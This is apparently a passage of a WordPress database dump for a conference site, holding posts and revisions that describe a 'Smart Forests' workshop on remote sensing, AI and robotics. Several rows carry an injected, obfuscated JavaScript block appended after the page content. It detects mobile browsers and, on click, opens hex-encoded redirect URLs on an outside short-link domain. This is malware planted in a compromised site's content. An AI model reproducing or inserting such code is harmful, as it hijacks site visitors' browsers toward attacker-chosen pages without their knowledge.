_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Smart Forests –                                                                                                        Forest ecosystem assessment and monitoring using Remote Sensing, Artificial Intelligence, and Robotics','','publish','closed','closed','','smart-forests-multi-scale-forest-ecosystem-assessment-and-monitoring-using-remote-sensing-artificial-intelligence-and-robotics','','','2023-02-02 07:05:44','2023-02-02 07:05:44','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=3049',0,'dt_portfolio','',0),
(3050,1,'2022-11-08 19:32:52','2022-11-08 19:32:52','','ws20m1','','inherit','open','closed','','ws20m1','','','2022-11-08 19:32:52','2022-11-08 19:32:52','',3049,'https://gsw2023.com/wp-content/uploads/2022/11/ws20m1.jpg',0,'attachment','image/jpeg',0),
(3051,1,'2022-11-08 19:33:11','2022-11-08 19:33:11','','<strong>Smart Forests – Multi-scale forest ecosystem assessment and monitoring using remote sensing, artificial intelligence, and robotics</strong>','','inherit','closed','closed','','3049-revision-v1','','','2022-11-08 19:33:11','2022-11-08 19:33:11','',3049,'https://gsw2023.com/?p=3051',0,'revision','',0),
(3052,1,'2022-11-08 19:38:34','2022-11-08 19:38:34','<p>[vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Smart Forests – Multi-scale forest ecosystem assessment and monitoring using remote sensing, artificial intelligence, and robotics</strong>','','inherit','closed','closed','','3049-revision-v1','','','2022-11-08 19:38:34','2022-11-08 19:38:34','',3049,'https://gsw2023.com/?p=3052',0,'revision','',0),
(3053,1,'2022-11-08 19:40:49','2022-11-08 19:40:49','<p>[vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>This Smart Forests workshop focuses on the assessment and monitoring of forest ecosystems using state-of-the-art Remote Sensing (RS), artificial intelligence (AI), and robotics. Highlighted in this workshop will be emerging topics on data acquisition, pre-processing, information extraction, and forest remote sensing applications to support improved understanding of forest ecosystems, efficient management of forest resources, and multi-scale approaches for forest assessment and monitoring. One of the aims of this workshop will be to encourage discussions on innovative robotic operation of sensors, platforms, and AI powered processing technologies, from the perspectives of practical applications. The workshop also encourages the benchmarking of various data sources and processing methods for extracting key forest metrics and attributes and modelling forest processes.</strong></h5>\n<h5><strong>This workshop is jointly organized by</strong></h5>\n<ul>\n<li>\n<h5><strong>WGIII/1 Remote Sensing data processing and understanding</strong></h5>\n</li>\n<li>\n<h5><strong>WGI/7 Data quality and benchmark of sensors</strong></h5>\n</li>\n<li>\n<h5><strong>WGIII/8 Remote sensing for agricultural and natural ecosystems</strong></h5>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 